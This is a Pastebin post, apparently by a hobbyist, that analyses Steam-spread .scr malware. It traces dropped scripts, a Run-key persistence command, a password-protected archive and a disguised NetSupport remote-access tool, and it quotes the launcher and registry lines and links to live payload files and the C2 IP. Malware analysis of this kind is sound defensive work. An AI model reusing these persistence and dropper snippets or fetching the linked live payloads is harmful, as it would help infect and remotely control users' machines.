API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 29th, 2015
238
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.66 KB | None | 0 0
raw download clone embed print report
  1. **WARNING: Information contained in this post may result in you infecting yourself with a live piece of MOSTLY UNDETECTED malware!**
  2.  
  3. **Proceed with caution!!!**
  4.  
  5. If anyone's used Steam a lot, they've inevitably come across a variation of one of those "Click this image link!" things that redirects you to a fake image hosting site, and downloads a .scr file.
  6.  
  7. Well, I got curious one day, so decided to investigate.
  8.  
  9. 1.) Scan with virustotal.com
  10.  
  11. [Virustotal Link](https://www.virustotal.com/en/file/808027e47111b52dac9e164713a4a408bb9f5ffcd814b09c57ed9b74bbab3359/analysis/1439847689/)
  12.  
  13. Currently undetected by everyone excluding 1 Chinese company. That's a little worrying. Must be something new (Although it's been around for years), or simply polymorphic (More probably)
  14.  
  15. 2.) Submit to malwr.com
  16.  
  17. [Analysis Link](https://malwr.com/analysis/MTcwNjEwNTMyYjk2NGRiMzgxZThjMzNhMjZkN2QyODE/)
  18.  
  19. Two main things to note here.
  20.  
  21. - Connection to www.myflare.com under "Network Analysis"
  22. - 3 dropped files
  23.  
  24. 3.) Investigation!
  25.  
  26. Dropped file 1
  27.  
  28. inst.js
  29.  
  30. > var WSHShell = WScript.CreateObject("WScript.Shell");
  31. WSHShell.Run('set.cmd',0);
  32. WSHShell.Run('run.cmd',0);
  33.  
  34. It runs 2 other files. But where do those come from?
  35.  
  36. Dropped file 2
  37.  
  38. down.js
  39.  
  40. [Pastebin Link](http://pastebin.com/7vAb4rqE) - **WARNING - Those MyFlare files are live - Take caution!**
  41.  
  42. Ok - That's a little more significant. It downloads 4 files. set.cmd and run.cmd are then run by the first dropped file - inst.js
  43.  
  44. Let's examine those
  45.  
  46. runs.exe - Toss it through ProtectionID and we get this - [Picture](http://i.imgur.com/1zd4rIF.png) - It's the 7zip extractor. That small mystery solved.
  47.  
  48. Next downloaded file - Simply called "file".
  49.  
  50. Rename it to a .txt, open with Notepad, and the first 3 characters show "7zΒΌ" - Possibly a 7zip archive. Rename the file to .rar, open with WinRAR, and we get...
  51.  
  52. [Picture](http://i.imgur.com/76p33Cs.png)
  53.  
  54. The NVidia Display settings in a compressed passworded file? That's weird. Anyways - Carrying on. The next downloaded file!
  55.  
  56. run.cmd - Open with notepad, and we get
  57.  
  58. > reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "nvxdsync32.exe" /t REG_SZ /d "%APPDATA%\Security\nvxdsync32.exe"
  59.  
  60. Hmmm - So it seems that NVidia driver is more than it appears... But the archive is passworded. Hopefully the final file will shed some light on matters!
  61.  
  62. set.cmd
  63.  
  64. [Pastebin Link](http://pastebin.com/1hQMyz7K)
  65.  
  66. Ok - Wow. This does a lot of stuff. A line that sticks out is
  67.  
  68. > "%APPDATA%\runs.exe" x -pferum -y "%APPDATA%\file" -o"%APPDATA%"
  69.  
  70. Remember "runs" was the renamed 7zip extractor? Well - What do we have here... "-pferum" ? Password of "ferum" ? Test, and....
  71.  
  72. [Picture](http://i.imgur.com/qEFcRWz.png) - It Extracted - In a hidden folder!
  73.  
  74. Open it, and... [Picture](http://i.imgur.com/7ORcF8a.png)
  75.  
  76. ...
  77.  
  78. So where are the rest files?
  79.  
  80. Well, it seems that set.cmd also plays around with folder permissions a bit... So let's try find them!
  81.  
  82. [Picture](http://i.imgur.com/EbS8q0n.png) - Yup - There they are!
  83.  
  84. After a bit of fiddling around - GOT THEM! -
  85. [Picture](http://i.imgur.com/WzAWfYg.png)
  86.  
  87. So - What's so special about that NVidia config file now... ? Right-Click Properties, and.... That doesn't look right! - [Picture](http://i.imgur.com/C2i3r0s.png)
  88.  
  89. Do a bit of research on Net Support, and we figure out that it's a piece of Remote Desktop software. Who would've thought!
  90.  
  91. 4.) The End
  92.  
  93. Now, this is unfortunately where my little adventure ends. For you see, whilst I was able to acquire a trial version of the Net Support software (It's a legitimate piece of software), I was unable to connect to his server, as I was unable to decipher the Gateway key he used.
  94.  
  95. [Config file - Picture](http://i.imgur.com/Jg0YblC.png) (Well well Mr Dew of Germany...)
  96.  
  97. [Vague decryption attempts - Picture](http://i.imgur.com/hrLiZII.png) - I could input characters and get an encrypted output. I had the output I needed, although I couldn't figure out the input. This is a sample of the input / output.
  98.  
  99. Unfortunately my Cryptography skills are insufficient, so here the story ends. I am simply one powerless individual, so am unable to do anything about tracking down the server IP - 46.165.206.78 - Currently online as of posting.
  100.  
  101. I hope you had a good read, maybe learned something, and enjoy the rest of your day!
  102.  
  103. **UPDATE**
  104.  
  105. rachaelmac from MyFlare support contacted me, and claimed the files in down.js were removed. They were not.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!